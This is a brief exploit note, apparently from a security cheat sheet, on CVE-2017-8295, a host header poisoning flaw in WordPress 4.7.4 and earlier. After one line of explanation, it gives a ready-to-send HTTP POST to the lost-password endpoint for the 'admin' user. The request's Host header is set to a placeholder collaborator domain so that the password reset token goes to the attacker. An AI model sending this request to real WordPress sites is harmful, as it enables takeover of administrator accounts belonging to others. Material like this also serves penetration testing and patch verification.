WordPress Account Takeover

The CVE-2017-8295 allows an attacker to modify the Host header to let the password reset token be sent and cause an account takeover. This is before WordPress <= 4.7.4

POST /wp/wordpress/wp-login.php?action=lostpassword HTTP/1.1
Host: <COLLABORATOR.COM>
Content-Type: application/x-www-form-urlencoded
Content-Length: 56

user_login=admin&redirect_to=&wp-submit=Get+New+Password